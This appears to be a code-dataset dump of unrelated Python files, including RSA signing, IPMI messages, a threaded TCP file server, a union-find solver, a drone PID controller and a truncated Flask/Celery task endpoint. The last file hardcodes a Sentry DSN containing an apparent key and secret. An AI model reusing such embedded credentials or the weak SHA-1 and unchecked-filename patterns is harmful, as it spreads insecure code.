index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
993,400 | 088c3bd4457e4b2265c0d150090a5ac5b79c0957 | #!/usr/bin/python
# coding=utf-8
import base64
from Crypto import Random
from Crypto.Hash import SHA
from Crypto.Signature import PKCS1_v1_5 as Signature_pkcs1_v1_5
from Crypto.PublicKey import RSA
from typing import Dict, Any
def key_generation():
# 伪随机数生成器
random_generator = Random.new().read
# 生成2048比特秘钥对(pk, sk)
rsa = RSA.generate(2048, random_generator)
private_pem = rsa.exportKey()
public_pem = rsa.publickey().exportKey()
return {'private_pem': private_pem, 'public_pem': public_pem}
def signature_generation(trade_message: str, private_key: str) -> str:
rsakey = RSA.importKey(private_key)
signer = Signature_pkcs1_v1_5.new(rsakey)
digest = SHA.new()
digest.update(trade_message.encode())
sign = signer.sign(digest)
signature = base64.b64encode(sign)
return signature.decode()
def signature_verify(trade_record: Dict[str, Any]) -> bool:
key = trade_record['sender']
signature = trade_record['signature'].encode()
trade_message = str(trade_record['sender']) + str(trade_record['recipient']) + str(trade_record['amount'])
rsakey = RSA.importKey(key)
verifier = Signature_pkcs1_v1_5.new(rsakey)
digest = SHA.new()
# Assumes the data is base64 encoded to begin with
digest.update(trade_message.encode())
is_verify = verifier.verify(digest, base64.b64decode(signature))
return is_verify
|
993,401 | fe660e25ea2f605a0e68d324437727bf6a20b65d | def add(a, b):
return a + b
add(2, 2)
2**100 + 2**101
|
993,402 | 6bd13f4360cf18dd38fa591631e93e469eefd9f9 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2019-10-18 12:29
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('live', '0004_auto_20191018_1058'),
]
operations = [
migrations.AddField(
model_name='live',
name='manager_profile_pic',
field=models.ImageField(blank=True, null=True, upload_to=''),
),
migrations.AddField(
model_name='live',
name='owner_profile_pic',
field=models.ImageField(blank=True, null=True, upload_to=''),
),
]
|
993,403 | 7fdffc9500bbc00e8a101f253f2c863caa2537a4 | #
# Copyright (c) 2020, Hyve Design Solutions Corporation.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Hyve Design Solutions Corporation nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY HYVE DESIGN SOLUTIONS CORPORATION AND
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
# HYVE DESIGN SOLUTIONS CORPORATION OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
from .. util.exception import PyMesgExcept, PyMesgCCExcept
import struct
__all__ = [
'IPMI_Message',
'IPMI_Raw',
'ipmi_app',
'ipmi_chassis',
'ipmi_se',
'ipmi_storage',
'ipmi_transport',
]
class IPMI_Message:
def __init__(self, netfn, cmd, req_data=None, lun=0):
self.netfn = netfn
self.cmd = cmd
self.req_data = req_data
self.lun = lun
self.payload_type = 0
@staticmethod
def dump_tuple(t1):
if type(t1) is not tuple:
return ''
data_str = ', '.join(('{0:x}'.format(i) if type(i) is not bytes
else (' '.join('{0:02x}'.format(j) for j in i)) for i in t1))
return '(' + data_str + ')'
def unpack(self, rsp, fmt=None):
# rsp = (netfn, cmd, cc, rsp_data)
if rsp[0] != self.netfn + 1:
raise PyMesgExcept('Invalid NetFn {0:02x}h in the response.'
.format(rsp[0]))
if rsp[1] != self.cmd:
raise PyMesgExcept('Invalid CMD {0:02x}h in the response.'
.format(rsp[1]))
cc, rsp_data = rsp[2:]
if isinstance(self, IPMI_Raw):
list1 = [cc]
if rsp_data is not None:
list1 += list(rsp_data)
return list1
if cc != 0:
raise PyMesgCCExcept(self.netfn, self.cmd, cc)
if fmt is None: return rsp_data # do not unpack the response
if rsp_data is None: # no response data, but fmt is not None
raise PyMesgExcept('Unexpected empty response data: NetFn={0:02X}h, CMD={1:02X}h. Expected {2}.'
.format(self.netfn, self.cmd, struct.calcsize(fmt)))
if struct.calcsize(fmt) != len(rsp_data):
raise PyMesgExcept('Invalid response data length: NetFn={0:02X}h, CMD={1:02X}h. Expected {2}, but returned {3}.'
.format(self.netfn, self.cmd, struct.calcsize(fmt), len(rsp_data)))
return struct.unpack(fmt, rsp_data) # has response data
class IPMI_Raw(IPMI_Message):
def __init__(self, req, lun=0):
# [netfn, cmd, req_data]
req_data = None
if len(req) > 2:
req_data = bytes(req[2:])
super(IPMI_Raw, self).__init__(req[0], req[1], req_data, lun)
def unpack(self, rsp):
# rsp = (netfn, cmd, cc, rsp_data)
return super(IPMI_Raw, self).unpack(rsp)
|
993,404 | 1035246cd9facbc2f7172899158a981e9dafce93 | from pyglet.media import Player, ManagedSoundPlayer
import pyglet
def play_background_music():
try:
player = Player()
player.eos_action = Player.EOS_LOOP
player.volume = 0.9
player.queue(pyglet.resource.media('data/music/music.ogg'))
player.play()
except Exception:
pass # do nothing
def play_shoot():
_play_sound('data/shoot.ogg', volume=0.4)
def play_explode():
_play_sound('data/explode.ogg')
def _play_sound(filename, volume=1.0):
try:
player = ManagedSoundPlayer()
player.queue(pyglet.resource.media(filename))
player.volume = volume
player.play()
except Exception:
pass # Do nothing
|
993,405 | 2bb451a804c24b2d08a5443148057b02ad7cf76e | from google.appengine.ext import ndb
class CrashReportGroup(ndb.Model):
created_at = ndb.DateTimeProperty(auto_now_add=True)
latest_crash_date = ndb.DateTimeProperty()
package_name = ndb.StringProperty()
@classmethod
def get_group(cls, package_name):
return cls.get_or_insert(package_name)
def report_count(self):
return CrashReport.query(ancestor=self.key).count()
def _pre_put_hook(self):
self.package_name = self.key.string_id()
class CrashReport(ndb.Model):
created_at = ndb.DateTimeProperty(auto_now_add=True)
android_version = ndb.StringProperty()
app_version_code = ndb.StringProperty()
app_version_name = ndb.StringProperty()
available_mem_size = ndb.StringProperty()
brand = ndb.TextProperty()
build = ndb.TextProperty()
crash_configuration = ndb.TextProperty()
device_features = ndb.TextProperty()
display = ndb.TextProperty()
environment = ndb.TextProperty()
file_path = ndb.TextProperty()
initial_configuration = ndb.TextProperty()
installation_id = ndb.TextProperty()
package_name = ndb.StringProperty()
model = ndb.StringProperty()
product = ndb.TextProperty()
report_id = ndb.TextProperty()
settings_secure = ndb.TextProperty()
settings_system = ndb.TextProperty()
shared_preferences = ndb.TextProperty()
stack_trace = ndb.TextProperty()
stack_summary = ndb.StringProperty()
total_mem_size = ndb.TextProperty()
user_app_start_date = ndb.DateTimeProperty()
user_crash_date = ndb.DateTimeProperty()
@classmethod
def get_all(cls):
query = cls.query()
return query.fetch()
@classmethod
def for_package(cls, package_name):
query = cls.query(cls.package_name == package_name)
query = query.order(- cls.created_at)
return query.fetch()
|
993,406 | 13be9bf8df123ee1ba2179af6fd5df6c0ed319c8 | class Solution(object):
def findTheDifference(self, s, t):
r = 0
for c in s:
r += ord(c)
for c in t:
r -= ord(c)
return chr(abs(r))
|
993,407 | e144d96a39b47566e3267af887182d0881bf93ee | #------------- SAMPLE THREADED SERVER ---------------
# Similar threading code can be found here:
# Python Network Programming Cookbook -- Chapter - 2
# Python Software Foundation: http://docs.python.org/2/library/socketserver.html
import socket
import threading
import SocketServer
import time
import random
import sys
import os
thread_counter = 0
# define a class to store the attributes of the files
class Files(object):
name = None
full_path = None
size = None
type = None
#creat a function to return a list of all the files
def getList():
List_of_files = []
curruent_path = os.getcwd()
file_found = False
response = ''
# loop through all the files in the current directory and create a Files objects and append to List_of_files
for files in os.listdir(curruent_path):
new_file = Files()
new_file.name = files
new_file.full_path = curruent_path + "\\" + files
new_file.size = os.path.getsize(curruent_path + "\\" + files)
fileName, fileExtension = os.path.splitext(new_file.full_path)
# tyeo if set for the file depending on its extension
if (fileExtension == '.mov'):
new_file.type = "viedo"
List_of_files.append(new_file)
elif (fileExtension == '.mp3'):
new_file.type = "music"
List_of_files.append(new_file)
elif (fileExtension == '.jpg'):
new_file.type = "picture"
List_of_files.append(new_file)
return List_of_files
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
global thread_counter
thread_counter += 1
cur_thread = threading.current_thread() # identify current thread
thread_name = cur_thread.name # get thread-number in python
print '\nServer Thread %s receives request: preparing response ' % thread_name
# while loop to keep the connection alive untill user quits
while (True):
data = self.request.recv(1024)
data = data.strip()
if(data != ''):
if(data.startswith('LIST')):
print "\nLIST Command From %s" % thread_name
response = ""
# get list of files using the fucntion define above
List_of_files=getList()
for files in List_of_files:
# prepare the response
response = response + str(files.type)+ "\t " + str(files.name) + "\t size: " + str(files.size) + " bytes\n"
if(response == ""):
# send the response using request.sendall
self.request.sendall("There is no files in the directory")
else:
self.request.sendall(response)
response = ""
print "LIST Task Done for %s" % thread_name
elif(data.startswith('READ')):
#get file list
List_of_files=getList()
if(len(data.split(',')) == 2):
filename = data.split(',')[1]
file_found = False
#loop through the list to check if the file exist
for files in List_of_files:
if(files.name == filename):
file_found = True
#send the file size to the client for error handling
self.request.sendall(str(files.size))
#change the directoy just in case
os.chdir(files.full_path[:len(files.full_path) - len(files.name)])
print "\nREAD Command From %s" %thread_name
print "Sending " + str(filename) + "to %s" %thread_name
# open the file in read byte mode for transfer
f1 = open(files.name, 'rb')
for line in f1:
#send each line of the file using a for loop
self.request.sendall(line)
# close the file after transfer
f1.close()
if(file_found == False):
#if file is not found, send error to the client for handling
response = "ERROR: could not find the file in the server"
self.request.sendall(response)
else:
#if received file name is broken, send error back to the client
response = "ERROR: missing file name"
self.request.sendall(response)
elif(data.startswith('WRITE')):
filename = str(data.split(',')[1])
filesize = int(data.split(',')[2])
print "Receiving: " + str(filename) + " from %s" % thread_name
amount_received = 0
f1 = open(filename,'wb')
while(amount_received < filesize):
# try to receive the file, if connection closes suddenly, except block will run
try:
mess = self.request.recv(64)
if mess:
#print '\nServer Thread recevied %s' % mess
# write to the file each line received
f1.write(mess)
amount_received += len(mess)
print "AR: " + str(amount_received) + " size: " + str(filesize)
else:
f1.close()
break
except:
# close and delete the file if anything goes wrong.
f1.close()
os.remove(f1.name)
break
if(amount_received == filesize):
print "Done Receiving"
self.request.sendall("From Server: Recevied File: " +str(filename))
elif(data == "BYE"):
# if bye is received, then break out of the while loop to end class
break;
# at the end of class, decrease thread counter
thread_counter -= 1
print "" + str(thread_counter)
if(thread_counter == 0):
return
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
if __name__ == "__main__":
quit_server = False
# Port 0 means to select an arbitrary unused port
HOST, PORT = "localhost", 10000
print "\nStart Threaded-Server on PORT %s " % PORT
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
# Terminate the server when the main thread terminates
# by setting daemon to True
server_thread.daemon = True
server_thread.start()
print "Main Server using thread %s " % server_thread.name
while True:
# using while loop and raw_input to allow admin to quit the server
command = raw_input("enter quit to exit server: \n")
if(command == "QUIT"):
if(thread_counter ==0):
# if no connections the server closes by server.shutdown and quit()
print 'Main server thread shutting down the server and terminating'
server.shutdown()
quit()
else:
print 'Waiting for threads to finish...'
while(thread_counter !=0):
# if there are connection, the admin can still force quit the server
force_comment = raw_input("Type FORCEQUIT to type abruptly. \n")
if(force_comment == "FORCEQUIT"):
print 'Bye'
os._exit(0)
quit_server = True
quit()
|
993,408 | 010ef5befba3fed29deb531db312f233eb22f4cc | import sys
import numpy as np
def inputs(func=lambda x: x, sep=None, maxsplit=-1):
return map(func, sys.stdin.readline().split(sep=sep, maxsplit=maxsplit))
def input_row(n : int, type=np.int, *args, **kwargs):
return np.fromiter(inputs(type, *args, **kwargs), dtype=type)
def input_2d(nrows : int, ncols : int, type=np.int, *args, **kwargs):
data = np.zeros((nrows, ncols), dtype=type)
for i in range(nrows):
data[i, :] = input_row(ncols, type, *args, **kwargs)
return data
class IntAddition (object):
'''整数の加法'''
def operate(self, x, y):
return x + y
@property
def identity(self):
return 0
def cancel(self, x, y):
return x - y
def invert(self, x):
return -x
def accumulate(self, x, count):
return x * count
class UnionFindNode (object):
__slots__ = [
'parent_index',
'size',
'difference_from_parent'
]
def __init__(self, index : int, potential_identity):
self.parent_index = index
self.size = 1
self.difference_from_parent = potential_identity
class UnionFind (object):
'''重み付きUnion-Find木'''
def __init__(
self,
num_nodes=0,
potential_abelian=IntAddition()):
self.nodes = []
self.op = potential_abelian
self.extend(num_nodes)
def append(self):
self.nodes.append(
UnionFindNode(len(self.nodes), self.op.identity)
)
def extend(self, num_nodes):
self.nodes.extend(
UnionFindNode(i, self.op.identity)
for i in range(num_nodes)
)
def root(self, index : int):
x = self.nodes[index]
while x.parent_index != index:
parent = self.nodes[x.parent_index]
x.difference_from_parent = self.op.operate(
x.difference_from_parent,
parent.difference_from_parent
)
index = x.parent_index = parent.parent_index
x = self.nodes[index]
return index
def difference_from_root_to(self, index : int):
x = self.nodes[index]
potential = x.difference_from_parent
while x.parent_index != index:
parent = self.nodes[x.parent_index]
potential = self.op.operate(
potential,
parent.difference_from_parent
)
index = x.parent_index
x = self.nodes[index]
return potential
def size(self, index : int):
return self.nodes[self.root(index)].size
def difference(self, x, y):
if not self.issame(x, y):
raise RuntimeError('x と y は同じ集合に属していません。')
return self.op.cancel(
self.difference_from_root_to(y),
self.difference_from_root_to(x)
)
def unite(self, x, y, difference=None) -> bool:
if difference is None:
difference = self.op.identity
x, px = self.root(x), self.difference_from_root_to(x)
y, py = self.root(y), self.difference_from_root_to(y)
if x == y:
return difference == self.op.cancel(py, px)
difference = self.op.cancel(difference, py)
difference = self.op.operate(difference, px)
if self.size(x) < self.size(y):
x, y = y, x
difference = self.op.invert(difference)
x_node = self.nodes[x]
y_node = self.nodes[y]
x_node.size += y_node.size
y_node.parent_index = x
y_node.difference_from_parent = difference
return True
def issame(self, x, y):
return self.root(x) == self.root(y)
N, M = inputs(int)
uf = UnionFind(num_nodes=N)
valid = True
for i in range(M):
L, R, D = inputs(int)
L -= 1
R -= 1
valid = valid and uf.unite(L, R, D)
print('Yes' if valid else 'No')
|
993,409 | b8f73e92c6da8dcb15419d1224db99fcfaa47821 |
import pyfx
import numpy as np
import ffmpeg
def video_dimensions(filename):
"""
Get dimensions of frames in a video file.
"""
probe = ffmpeg.probe(filename)
video_stream = next((stream for stream in probe['streams']
if stream['codec_type'] == 'video'), None)
width = int(video_stream['width'])
height = int(video_stream['height'])
return width, height
def video_to_array(filename):
"""
Load a video into a 4D numpy array: [frame,width,height,RGB]
"""
width, height = video_dimensions(filename)
video_stream, _ = (
ffmpeg
.input(filename)
.output('pipe:', format='rawvideo', pix_fmt='rgb24')
.run(capture_stdout=True)
)
video = (
np
.frombuffer(video_stream, np.uint8)
.reshape([-1, height, width, 3])
)
return video
def to_video(img_set,output_file):
pass
"""
process1 = (
ffmpeg
.input(in_filename)
.output('pipe:', format='rawvideo', pix_fmt='rgb24')
.run_async(pipe_stdout=True)
)
process2 = (
ffmpeg
.input('pipe:', format='rawvideo', pix_fmt='rgb24', s='{}x{}'.format(width, height))
.output(out_filename, pix_fmt='yuv420p')
.overwrite_output()
.run_async(pipe_stdin=True)
)
while True:
in_bytes = process1.stdout.read(width * height * 3)
if not in_bytes:
break
in_frame = (
np
.frombuffer(in_bytes, np.uint8)
.reshape([height, width, 3])
)
out_frame = in_frame * 0.3
process2.stdin.write(
frame
.astype(np.uint8)
.tobytes()
)
process2.stdin.close()
process1.wait()
process2.wait()
"""
|
993,410 | db5b6c6efd36f75afae76bb166ed5015f5983b0b | # Set of function to solve the PDE for a result until we meet the tolerance at all points
from function import func
def solve(nodes, tol):
# initialize madDel as greater than the tolerance
madDel = tol + 1
iterator = 0
while (madDel > tol) and iterator < 10000:
newValues = []
iterator = iterator + 1
# Iterate through the nodes and solve as needed
for k in range(len(nodes)):
node = nodes[k]
val = func(node,node.neighbours["left"],node.neighbours["right"],node.neighbours["top"],node.neighbours["bottom"])
newValues.append(val)
#some equation
# Calculate the max change, 'madDel', of the new positions
madDel = calcDel(newValues, nodes)
for k in range(len(newValues)):
nodes[k].T = newValues[k]
print(iterator)
return nodes
def calcDel(newValues, nodes):
maxDel = 0
for k in range(len(newValues)):
change = abs(newValues[k] - nodes[k].T)
if change > maxDel:
maxDel = change
return maxDel |
993,411 | 4bf735fd7c0058b0b34374a61ecc2a6a2cc9b93b | import requests
Base = "http://127.0.0.1:5000/"
moc_data = [{"name":"potato", "discount":0.7, "id":1},
{"name":"tomato", "discount":0.1, "id":2},
{"name":"ququmba", "discount":0.2, "id":3}]
for i in range(len(moc_data)):
response = requests.put(Base + "mall/" + str(i), moc_data[i])
print(response.json())
input()
response = requests.delete(Base + "mall/0")
print(response)
input()
response = requests.get(Base + "mall/1")
print(response.json()) |
993,412 | 2bd636fd41a0ddbfaf98d624d2add2503003062e | def isprime(n):
if n <= 1:
return False
if n <= 3:
return True
if n % 2 == 0 or n % 3 == 0:
return False
i = 5
while i*i <= n:
if n % i == 0 or n % (i+2) == 0:
return False
i += 6
return True
def gen_primes(n):
prime_list = []
num = 2
while num < n:
is_prime = True
for index, prime in enumerate(prime_list):
if num % prime == 0:
is_prime = False
break
if is_prime == True:
prime_list.append(num)
num += 1
return prime_list
def is_written(n):
primes = gen_primes(n)
for index, prime in enumerate(primes):
square_num = 1
while square_num*square_num < n:
if prime + 2*square_num*square_num == n:
return True
square_num += 1
return False
odd_composite = 33
while True:
if odd_composite % 10000:
print(odd_composite)
while isprime(odd_composite):
odd_composite += 2
if not is_written(odd_composite):
print('{} cannot be written as a sum of a prime and two times a square'.format(odd_composite))
odd_composite += 2
|
993,413 | 3b6c745062ab6e21c18d1024fdcb20ccca7606b7 | #!/usr/bin/env python
# coding: utf-8
import numpy as np
import os, sys, time, copy, yaml
from .utils import *
# Controller base
class UAV_pid():
def __init__(self, *args, **kwargs):
# PID Controller Vehicle Parameters
if 'debug' in kwargs:
self.flag_debug = kwargs['debug']
else:
self.flag_debug = False
if 'gravity' in kwargs:
self.gravity_ = kwargs['gravity']
else:
if self.flag_debug:
print("Did not get the gravity from the params, defaulting to 9.81 m/s^2")
self.gravity_ = 9.81
if 'vehicleMass' in kwargs:
self.vehicleMass_ = kwargs['vehicleMass']
else:
if self.flag_debug:
print("Did not get the vehicle mass from the params, defaulting to 1.0 kg")
self.vehicleMass_ = 1.0
if 'vehicleInertia' in kwargs:
self.vehicleInertia_ = kwargs['vehicleInertia']
else:
if self.flag_debug:
print("Did not get the PID inertia from the params, defaulting to [0.0049, 0.0049. 0.0069] kg m^2")
self.vehicleInertia_ = np.array([0.0049, 0.0049, 0.0069])
if 'momentArm' in kwargs:
self.momentArm_ = kwargs['momentArm']
else:
if self.flag_debug:
print("Did not get the PID moment arm from the params, defaulting to 0.08 m")
self.momentArm_ = 0.08
if 'thrustCoeff' in kwargs:
self.thrustCoeff_ = kwargs['thrustCoeff']
else:
if self.flag_debug:
print("Did not get the PID thrust coefficient from the params, defaulting to 1.91e-6 N/(rad/s)^2")
self.thrustCoeff_ = 1.91e-6
if 'torqueCoeff' in kwargs:
self.torqueCoeff_ = kwargs['torqueCoeff']
else:
if self.flag_debug:
print("Did not get the PID torque coefficient from the params, defaulting to 2.6e-7 Nm/(rad/s)^2")
self.torqueCoeff_ = 2.6e-7
if 'motorRotorInertia' in kwargs:
self.motorRotorInertia_ = kwargs['motorRotorInertia']
else:
if self.flag_debug:
print("Did not get the PID torque coefficient from the params, defaulting to 2.6e-7 Nm/(rad/s)^2")
self.motorRotorInertia_ = 6.62e-6
if 'motorTimeConstant' in kwargs:
self.motorTimeConstant_ = kwargs['motorTimeConstant']
else:
if self.flag_debug:
print("Did not get the PID torque coefficient from the params, defaulting to 2.6e-7 Nm/(rad/s)^2")
self.motorTimeConstant_ = 0.02
return
def thrust_mixing(self, angAccCommand, thrustCommand):
# Compute torque and thrust vector
momentThrust = np.array([
self.vehicleInertia_[0]*angAccCommand[0],
self.vehicleInertia_[1]*angAccCommand[1],
self.vehicleInertia_[2]*angAccCommand[2],
-thrustCommand])
# # Compute signed, squared motor speed values
# motorSpeedsSquared = np.array([
# momentThrust[0]/(4*self.momentArm_*self.thrustCoeff_) + (-momentThrust[1])/(4*self.momentArm_*self.thrustCoeff_) + \
# (-momentThrust[2])/(4*self.torqueCoeff_) + momentThrust[3]/(4*self.thrustCoeff_),
# momentThrust[0]/(4*self.momentArm_*self.thrustCoeff_) + momentThrust[1]/(4*self.momentArm_*self.thrustCoeff_) + \
# momentThrust[2]/(4*self.torqueCoeff_) + momentThrust[3]/(4*self.thrustCoeff_),
# (-momentThrust[0])/(4*self.momentArm_*self.thrustCoeff_) + momentThrust[1]/(4*self.momentArm_*self.thrustCoeff_) + \
# (-momentThrust[2])/(4*self.torqueCoeff_)+ momentThrust[3]/(4*self.thrustCoeff_),
# (-momentThrust[0])/(4*self.momentArm_*self.thrustCoeff_) + (-momentThrust[1])/(4*self.momentArm_*self.thrustCoeff_) + \
# momentThrust[2]/(4*self.torqueCoeff_) + momentThrust[3]/(4*self.thrustCoeff_)
# ])
G1xy = self.thrustCoeff_ * self.momentArm_
G1z = self.torqueCoeff_
G1t = self.thrustCoeff_
G2z = self.motorRotorInertia_ / self.motorTimeConstant_
invG1xy = 1./(4.*G1xy)
invG1z = 1./(4.*G1z)
invG1t = 1./(4.*G1t)
invG1 = np.zeros((4,4))
invG1 = np.array([
[ invG1xy, invG1xy, -invG1z, -invG1t],
[-invG1xy, invG1xy, invG1z, -invG1t],
[-invG1xy, -invG1xy, -invG1z, -invG1t],
[ invG1xy, -invG1xy, invG1z, -invG1t]
])
# Initial estimate of commanded motor speed using only G1
motorSpeedsSquared = invG1.dot(momentThrust)
# Compute signed motor speed values
propSpeedCommand = np.zeros(4)
for i in range(4):
propSpeedCommand[i] = np.copysign(np.sqrt(np.fabs(motorSpeedsSquared[i])), motorSpeedsSquared[i])
return propSpeedCommand
# PID angular rate controller
class UAV_pid_angular_rate(UAV_pid):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# PID Controller Gains (roll / pitch / yaw)
if 'propGain' in kwargs:
self.propGain_ = kwargs['propGain']
else:
if self.flag_debug:
print("Did not get the PID gain p from the params, defaulting to 9.0")
self.propGain_ = np.array([9.0, 9.0, 9.0])
if 'intGain' in kwargs:
self.intGain_ = kwargs['intGain']
else:
if self.flag_debug:
print("Did not get the PID gain i from the params, defaulting to 3.0")
self.intGain_ = np.array([3.0, 3.0, 3.0])
if 'derGain' in kwargs:
self.derGain_ = kwargs['derGain']
else:
if self.flag_debug:
print("Did not get the PID gain d from the params, defaulting to 0.3")
self.derGain_ = np.array([0.3, 0.3, 0.3])
# PID Controller Integrator State and Bound
self.intState_ = np.array([0., 0., 0.])
if 'intBound' in kwargs:
self.intBound_ = kwargs['intBound']
else:
if self.flag_debug:
print("Did not get the PID integrator bound from the params, defaulting to 1000.0")
self.intBound_ = np.array([1000., 1000., 1000.])
return
def control_update(self, angVelCommand, thrustCommand, curval, curder, dt):
angAccCommand = np.zeros(3)
stateDev = angVelCommand - curval
self.intState_ += dt*stateDev
self.intState_ = np.fmin(np.fmax(-self.intBound_,self.intState_),self.intBound_)
angAccCommand = self.propGain_*stateDev + \
self.intGain_*self.intState_ - self.derGain_*curder
propSpeedCommand = self.thrust_mixing(angAccCommand, thrustCommand)
return propSpeedCommand
def reset_state(self):
self.intState_ = np.zeros(3)
return
# PID position controller
class UAV_pid_waypoint(UAV_pid_angular_rate):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# PID Controller Gains (x, y, z)
if 'positionGain' in kwargs:
self.position_gain = kwargs['positionGain']
else:
self.position_gain = np.array([7., 7., 7.])
if 'velocityGain' in kwargs:
self.velocity_gain = kwargs['velocityGain']
else:
self.velocity_gain = np.array([3., 3., 3.])
if 'integratorGain' in kwargs:
self.integrator_gain = kwargs['integratorGain']
else:
self.integrator_gain = np.array([0., 0., 0.])
if 'attitudeGain' in kwargs:
self.attitude_gain = kwargs['attitudeGain']
else:
self.attitude_gain = np.array([10., 10., 10.])
if 'thrustDirection' in kwargs:
self.thrust_dir = kwargs['thrustDirection']
else:
self.thrust_dir = np.array([0., 0., -1.])
if 'maxAcceleration' in kwargs:
self.max_acceleration = kwargs['maxAcceleration']
else:
self.max_acceleration = 3.0
if 'maxAngrate' in kwargs:
self.max_angrate = kwargs['maxAngrate']
else:
self.max_angrate = 8.0
if 'maxSpeed' in kwargs:
self.max_speed = kwargs['maxSpeed']
else:
self.max_speed = 3.0
self.max_velocity_poserror = self.max_speed*(self.velocity_gain/self.position_gain)
self.position_error_integrator = np.zeros(3)
return
def saturateVector(self, vec, bound):
if isinstance(bound, np.ndarray):
ret_vec = copy.deepcopy(vec)
bound_t = np.squeeze(bound)
for i in range(bound_t.shape[0]):
ret_vec[i] = max(-bound_t[i], min(vec[i], bound_t[i]))
return ret_vec
else:
return np.fmax(-bound, np.fmin(vec, bound))
def get_control(self, pos_err, att_cur, curvel, att_ref):
# getAccelerationCommand
sat_pos_err = self.saturateVector(pos_err, self.max_velocity_poserror)
acc_cmd = self.position_gain*sat_pos_err \
- self.velocity_gain*curvel \
+ self.integrator_gain*self.position_error_integrator
# saturateVector
acc_cmd = self.saturateVector(acc_cmd, self.max_acceleration)
acc_cmd[2] -= 9.81
thrust_cmd = self.vehicleMass_*acc_cmd
# getAttitudeCommand
thrustcmd_yawframe = quat_rotate(att_ref, thrust_cmd)
thrust_rot = vecvec2quat(self.thrust_dir, thrustcmd_yawframe)
att_cmd = mul_quat(att_ref, thrust_rot)
# getAngularRateCommand
att_error = mul_quat(inv_quat(att_cur), att_cmd)
if att_error[0] < 0.:
att_error *= -1.
angle_error = quat2Euler(att_error)
angrate_cmd = angle_error*self.attitude_gain
scalar_thrust = np.linalg.norm(thrust_cmd)
angrate_cmd = self.saturateVector(angrate_cmd, self.max_angrate)
res = dict()
res["angularrate"] = angrate_cmd
res["thrust"] = scalar_thrust
return res
def control_update(self, command, curpos, curvel, curatt, curattVel, curattAcc, dt):
# Get position offsets
del_x = command[0] - curpos[0]
del_y = command[1] - curpos[1]
del_z = command[2] - curpos[2]
pos_err = np.array([del_x, del_y, del_z])
self.position_error_integrator += dt*pos_err
if command.size == 4:
yaw_ref = command[3]
else:
# yaw_ref = quat2Euler(curatt)[2]
yaw_ref = 0.0
att_ref = Euler2quat(np.array([0,0,yaw_ref]))
att_cur = Euler2quat(np.array([curatt[0],curatt[1],curatt[2]]))
res = self.get_control(pos_err, att_cur, curvel, att_ref)
attVelCommand = np.array([res["angularrate"][0],res["angularrate"][1],res["angularrate"][2]])
stateDev = attVelCommand - curattVel
self.intState_ += dt*stateDev
self.intState_ = np.fmin(np.fmax(-self.intBound_,self.intState_),self.intBound_)
angAccCommand = self.propGain_*stateDev + \
self.intGain_*self.intState_ - self.derGain_*curattAcc
propSpeedCommand = self.thrust_mixing(angAccCommand, res["thrust"])
return propSpeedCommand
def reset_state(self):
self.intState_ = np.zeros(3)
self.position_error_integrator = np.zeros(3)
return
if __name__ == "__main__":
# execute only if run as a script
print("test")
|
993,414 | a48a3dd9ce903f76356eeb95fa4352cb3a2df6e6 | # -*- coding:utf-8 -*-
import json
from celery import signature
from flask import jsonify # Content-Type: application/json Content-Type: text/html; charset=utf-8
# celeryApp = Celery(broker=Config.CELERY_BROKER_URL)
# celeryApp.conf.update(app.config)
# celeryApp.autodiscover_tasks(['yiqidai','yunzhangfang','huisuanzhang'])
from flask import request
from raven.contrib.flask import Sentry
from config import Config
# from public.docker_for_browsers import DockerForBrowsers
from App import app # falsk
#使用sentry监听异常
from task.main import export_tasks # celely
sentry = Sentry(app, dsn='https://cc465b09e4004bd790db724a7d4252eb:6f73513a850d4e26b34612de0a08f7c9@192.168.20.244:9000//6')
# 初始化浏览器池子
from public.pool import PoolOptions,Pool
options = PoolOptions()
pool = Pool(options)
@app.route('/task', methods=['post'])
def export_task():
# 企业号码,账号,密码,
data = request.json or {}
res = {}
site = ''
login_info = {}
ztList = []
callback_ip = ''
if not data:
if not request.form:
res['msg'] = '没有数据'
else:
site = request.form.get('db_name', '')
login_info = request.form.get('login_info', '')
callback_ip = request.form.get('callback_ip', '')
login_info = json.loads(login_info)
zt = request.form.get('zt', '')
ztList = json.loads(zt)
else:
site = data.get('db_name', '')
login_info = data.get('login_info', '')
callback_ip = request.form.get('callback_ip', '')
ztList = data.get('zt', '')
if site == 'kungeek':
browser = pool.get_browser('chrome', 'kungeek')
msg = try_to_login(browser,login_info,'HSZ')
if msg == '登陆成功':
from huisuanzhang.NewViews import GetInfo
gti = GetInfo(browser)
ztData = gti.getAllzt()
